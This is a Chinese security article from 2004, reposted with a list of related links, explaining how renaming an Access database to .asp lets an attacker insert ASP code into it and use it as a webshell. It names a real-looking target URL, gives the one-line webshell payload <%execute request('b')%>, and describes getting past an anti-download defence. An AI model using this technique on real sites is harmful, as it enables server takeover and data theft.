改mdb为asp所带来的灾难
2008-11-15 16:48
274 查看
改mdb为asp所带来的灾难 | |||
本文作者:SuperHei·Lilo 文章性质:原创 发布日期:2004-09-16 | |||
可能是随着网络安全技术的发展吧,管理员的素质都在提高,在使用access+asp系统时,为不数据库被人下载,到把mdb改为asp或asa。先不说直接改后缀,直接可以用网快等工具直接下载,其实这样你已经是为入侵者打开了大门。入侵者可以利用asp/asa为后缀的数据库直接得到webshell。 一.思路 大家都知道<%%>为asp文件的标志符,也就是说一个asp文件只会去执行<% %>之间的代码,access+asp的web系统的所有数据都是存放在数据库文件里(mdb文件),由于管理者把mdb文件改为了asp文件,如果我们提交的数据里包含有<%%>,那当我们访问这个asp数据库的时候就会去执行<%%>之间的代码。这样导致我们只提交恶意代码给数据库,那么asp后缀的数据库就是我们的webshell了。 二.示例 随便找个目标,首先我们暴库,看是不是asp后缀的数据库: http://220.170.151.103/test/dlog%5cshowlog.asp?cat_id=5&log_id=210 返回:
注意:我们在向数据库提交代码时,代码内容不可以太大。所以我们采用<%execute request("b")%>。 三.其他一些问题和思路 1.对于改了后缀为asp,还对数据库里加入了<%=’a’-1%>等非法的asp代码来彻底防止下载的数据库,由于里面存在了非法的asp代码,插入我们的webshell代码后运行,将只会显示前面非法代码的错误,而不去执行我们shell的代码。虽然这样可以防止一定的攻击,但还是存在一定的隐患,我们只要在出错的代码前加入兼容错误的代码,就可以得到正确显示执行我们插入的webshell代码了。 2.对于没有改后缀的,也就是mdb文件,这样我们可以先直接下载下来得到后台密码,进了后台,可以利用数据库备用改后缀为asp。 | |||
【打印这篇文章】【关闭该窗口】 | |||
Copyright © 2004 Security Angel Team [S4T] All Rights Reserved. |
相关文章推荐
- 解决“改mdb为asp所带来的灾难”
- [转贴]改mdb为asp所带来的灾难
- access改mdb为asp所带来的灾难 附mdb防下载方法
- 改mdb为asp所带来的灾难
- 改mdb为asp所带来的灾难
- 《改mdb为asp所带来的灾难》之狗尾续貂
- access改mdb为asp所带来的灾难 附mdb防下载方法
- 《改mdb为asp所带来的灾难》之狗尾续貂
- 改mdb为asp所带来的灾难
- 改mdb为asp所带来的灾难
- 重读《从菜鸟到测试架构师》-- 大促带来的灾难
- IIS7.0下ASP+Access(MDB)应用环境设置要点
- ASP.NET AJAX正式版带来的Validator问题及解决方案
- ASP.NET 3.5 Extensions带来什么
- 暴饮暴食 将给你的健康带来灾难
- MDB文件变成ASP文件相关
- asp.net 无cookie会话带来的问题
- ASP将EXCEL导入MDB
- 用ASP打开远端MDB文件
- 人造飞行器撞击空间星体是一种野蛮的行为,并且有可能给人类带来致命灾难